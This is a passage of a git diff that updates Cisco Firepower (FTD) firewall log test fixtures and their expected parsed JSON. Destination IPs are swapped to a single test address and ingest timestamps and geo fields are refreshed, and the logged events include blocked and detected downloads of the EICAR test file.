ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb +2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity +2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip 2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json index 6071f449409..52f31f7087c 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json @@ -62,7 +62,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873358281Z", + "ingested": "2021-12-09T13:33:12.624161600Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:53.873363825Z", + "ingested": "2021-12-09T13:33:12.624169900Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -247,24 +247,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 0 }, "source": { @@ -312,7 +315,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -320,8 +323,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873366012Z", - "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", + "ingested": "2021-12-09T13:33:12.624175500Z", + "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", "action": "connection-started", @@ -353,7 +356,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "50074", "src_ip": "10.0.1.20", @@ -388,24 +391,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 2 }, "source": { @@ -453,7 +459,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -462,8 +468,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:53.873443908Z", - "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", + "ingested": "2021-12-09T13:33:12.624180900Z", + "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", "start": "2019-08-15T16:07:00.000Z", @@ -493,7 +499,7 @@ "dns_query": "siem-inside", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -529,26 +535,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "52.59.244.233", + "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "52.59.244.233", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -594,7 +600,7 @@ ], "ip": [ "10.0.1.20", - "52.59.244.233" + "81.2.69.144" ] }, "host": { @@ -602,8 +608,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873452443Z", - "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", + "ingested": "2021-12-09T13:33:12.624186200Z", + "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", "action": "connection-started", @@ -633,7 +639,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "52.59.244.233", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "43228", "src_ip": "10.0.1.20", @@ -660,26 +666,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "52.59.244.233", + "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "52.59.244.233", + "ip": "81.2.69.144", "packets": 29001 }, "source": { @@ -737,7 +743,7 @@ ], "ip": [ "10.0.1.20", - "52.59.244.233" + "81.2.69.144" ] }, "host": { @@ -751,8 +757,8 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-07-19T09:06:53.873454944Z", - "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", + "ingested": "2021-12-09T13:33:12.624191600Z", + "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", "start": "2019-08-15T16:07:18.000Z", @@ -781,7 +787,7 @@ "responder_packets": "29001", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "52.59.244.233", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "tcp", @@ -823,26 +829,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "213.211.198.62", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -888,7 +894,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { @@ -896,8 +902,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873457118Z", - "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", + "ingested": "2021-12-09T13:33:12.624240600Z", + "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", "action": "connection-started", @@ -927,7 +933,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "46000", "src_ip": "10.0.1.20", @@ -954,26 +960,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "213.211.198.62", + "ip": "81.2.69.144", "packets": 4 }, "source": { @@ -1028,7 +1034,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { @@ -1042,8 +1048,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:53.873459202Z", - "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", + "ingested": "2021-12-09T13:33:12.624248Z", + "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", "start": "2019-08-16T09:33:15.000Z", @@ -1072,7 +1078,7 @@ "responder_packets": "4", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "tcp", @@ -1166,7 +1172,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873461054Z", + "ingested": "2021-12-09T13:33:12.624253500Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1298,7 +1304,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-07-19T09:06:53.873467586Z", + "ingested": "2021-12-09T13:33:12.624259Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log index 5a6fe1852f7..fae3c9aebf8 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log @@ -5,6 +5,6 @@ Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100. Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip -2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip +2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip 2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d -2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d +2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d diff --git 